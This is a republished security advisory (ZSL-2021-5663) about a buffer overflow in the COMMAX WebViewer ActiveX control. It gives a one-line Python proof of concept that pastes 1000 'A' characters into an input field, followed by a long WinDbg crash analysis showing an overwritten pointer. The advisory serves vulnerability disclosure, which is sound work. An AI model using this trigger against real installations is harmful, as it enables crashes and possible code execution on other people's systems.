Tuesday, August 17, 2021

COMMAX WebViewer ActiveX Control 2.1.4.5 Buffer Overflow


COMMAX WebViewer ActiveX Control 2.1.4.5 (Commax_WebViewer.ocx) Buffer Overflow


Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: 2.1.4.5

Summary: COMMAX activex web viewer client (32bit) for COMMAX DVR/NVR.

Desc: The vulnerability is caused due to a boundary error in the
processing of user input, which can be exploited to cause a buffer
overflow when a user inserts overly long array of string bytes
through several functions. Successful exploitation could allow
execution of arbitrary code on the affected node.

Tested on: Microsoft Windows 10 Home (64bit) EN
Microsoft Internet Explorer 20H2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2021-5663
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5663.php


02.08.2021

--


$ python
>>> "A"*1000 [ToTheClipboard]
>>>#Paste in ID or anywhere

(5220.5b30): Access violation - code c0000005 (!!! second chance !!!)
wow64!Wow64pNotifyDebugger+0x19918:
00007ff9`deb0b530 c644242001 mov byte ptr [rsp+20h],1 ss:00000000`0c47de00=00
0:038> g
(5220.5b30): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for CNC_Ctrl.DLL -
CNC_Ctrl!DllUnregisterServer+0xf5501:
0b4d43bf f3aa rep stos byte ptr es:[edi]
0:038:x86> r
eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141
eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
CNC_Ctrl!DllUnregisterServer+0xf5501:
0b4d43bf f3aa rep stos byte ptr es:[edi]
0:038:x86> !exchain
0d78fac4: CNC_Ctrl!DllUnregisterServer+eca92 (0b4cb950)
0d78fb74: ntdll_76f80000!_except_handler4+0 (76ffad20)
CRT scope 0, filter: ntdll_76f80000!__RtlUserThreadStart+3cdb7 (77024806)
func: ntdll_76f80000!__RtlUserThreadStart+3ce50 (7702489f)
0d78fb8c: ntdll_76f80000!FinalExceptionHandlerPad25+0 (77008a29)
Invalid exception stack at ffffffff
0:038:x86> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
01 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
02 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
03 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7
0:038:x86> d esp
0d78f920 0f 00 00 00 00 00 00 00-dc 2e ff 76 78 c5 7e 0b ...........vx.~.
0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA....
0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~.....
0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%[email protected] ...
0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x.........
0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v
0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v
0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t...
0:038:x86> d ebp
0d78f930 b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00 ..~..]@.AAAA....
0d78f940 00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00 . ......x.~.....
0d78f950 10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00 .^.u%[email protected] ...
0d78f960 00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00 .i.a..x.........
0d78f970 10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76 ..........x.W(.v
0d78f980 70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76 p:...........(.v
0d78f990 00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00 ............t...
0d78f9a0 8c 0c 00 00 88 0e 00 00-8c 0e 00 00 b8 0d 00 00 ................
0:038:x86> d esi
41414141 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414151 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414161 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414171 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414181 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
41414191 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
414141a1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
414141b1 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0:038:x86> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************

*** ERROR: Symbol file could not be found. Defaulted to export symbols for ie_to_edge_bho.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for Commax_WebViewer.OCX -
GetUrlPageData2 (WinHttp) failed: 12002.

DUMP_CLASS: 2

DUMP_QUALIFIER: 0

FAULTING_IP:
CNC_Ctrl!DllUnregisterServer+f5501
0b4d43bf f3aa rep stos byte ptr es:[edi]

EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 0b4d43bf (CNC_Ctrl!DllUnregisterServer+0x000f5501)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 41414141
Attempt to write to address 41414141

FAULTING_THREAD: 00005b30

DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE

PROCESS_NAME: IEXPLORE.EXE

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE_STR: c0000005

EXCEPTION_PARAMETER1: 00000001

EXCEPTION_PARAMETER2: 41414141

FOLLOWUP_IP:
CNC_Ctrl!DllUnregisterServer+f5501
0b4d43bf f3aa rep stos byte ptr es:[edi]

WRITE_ADDRESS: 41414141

WATSON_BKT_PROCSTAMP: 95286d96

WATSON_BKT_PROCVER: 11.0.19041.1

PROCESS_VER_PRODUCT: Internet Explorer

WATSON_BKT_MODULE: CNC_Ctrl.DLL

WATSON_BKT_MODSTAMP: 547ed821

WATSON_BKT_MODOFFSET: 1043bf

WATSON_BKT_MODVER: 1.7.0.2

MODULE_VER_PRODUCT: CNC_Ctrl Module

BUILD_VERSION_STRING: 10.0.19041.1023 (WinBuild.160101.0800)

MODLIST_WITH_TSCHKSUM_HASH: aadfa1c5bdd8f77b979f6a5b222994db450b715e

MODLIST_SHA1_HASH: 849cfdbdcb18d5749dc41f313fc544a643772db9

NTGLOBALFLAG: 0

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS: 0

PRODUCT_TYPE: 1

SUITE_MASK: 784

DUMP_TYPE: fe

ANALYSIS_SESSION_HOST: LAB17

ANALYSIS_SESSION_TIME: 08-12-2021 14:20:11.0116

ANALYSIS_VERSION: 10.0.16299.91 amd64fre

THREAD_ATTRIBUTES:
OS_LOCALE: ENU

PROBLEM_CLASSES:

ID: [0n301]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0x5b30]
Frame: [0] : CNC_Ctrl!DllUnregisterServer

ID: [0n274]
Type: [INVALID_POINTER_WRITE]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0x5b30]
Frame: [0] : CNC_Ctrl!DllUnregisterServer

ID: [0n152]
Type: [ZEROED_STACK]
Class: Addendum
Scope: BUCKET_ID
Name: Add
Data: Omit
PID: [0x5220]
TID: [0x5b30]
Frame: [0] : CNC_Ctrl!DllUnregisterServer

BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK

PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT

LAST_CONTROL_TRANSFER: from 0b405dea to 0b4d43bf

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7


THREAD_SHA1_HASH_MOD_FUNC: e84e62df4095d241971250198ae18de0797cfdc7

THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 2033316a7c1a92aaeab1ce97e013350953fef546

THREAD_SHA1_HASH_MOD: 6d850af928076b326edbcafdf6dd4f771aafbab5

FAULT_INSTR_CODE: 458baaf3

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: CNC_Ctrl!DllUnregisterServer+f5501

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: CNC_Ctrl

IMAGE_NAME: CNC_Ctrl.DLL

DEBUG_FLR_IMAGE_TIMESTAMP: 547ed821

STACK_COMMAND: ~38s ; .cxr ; kb

FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer

BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+f5501

FAILURE_EXCEPTION_CODE: c0000005

FAILURE_IMAGE_NAME: CNC_Ctrl.DLL

BUCKET_ID_IMAGE_STR: CNC_Ctrl.DLL

FAILURE_MODULE_NAME: CNC_Ctrl

BUCKET_ID_MODULE_STR: CNC_Ctrl

FAILURE_FUNCTION_NAME: DllUnregisterServer

BUCKET_ID_FUNCTION_STR: DllUnregisterServer

BUCKET_ID_OFFSET: f5501

BUCKET_ID_MODTIMEDATESTAMP: 547ed821

BUCKET_ID_MODCHECKSUM: 357a4b

BUCKET_ID_MODVER_STR: 1.7.0.2

BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_

FAILURE_PROBLEM_CLASS: APPLICATION_FAULT

FAILURE_SYMBOL_NAME: CNC_Ctrl.DLL!DllUnregisterServer

WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/IEXPLORE.EXE/11.0.19041.1/95286d96/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/001043bf.htm?Retriage=1

TARGET_TIME: 2021-08-12T12:21:50.000Z

OSBUILD: 19042

OSSERVICEPACK: 1023

SERVICEPACK_NUMBER: 0

OS_REVISION: 0

OSPLATFORM_TYPE: x64

OSNAME: Windows 10

OSEDITION: Windows 10 WinNt SingleUserTS Personal

USER_LCID: 0

OSBUILD_TIMESTAMP: unknown_date

BUILDDATESTAMP_STR: 160101.0800

BUILDLAB_STR: WinBuild

BUILDOSVER_STR: 10.0.19041.1023

ANALYSIS_SESSION_ELAPSED_TIME: 1d869

ANALYSIS_SOURCE: UM

FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver

FAILURE_ID_HASH: {5e1e375a-c411-e928-cd64-b7f6c07eea3b}

Followup: MachineOwner
---------
 

Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated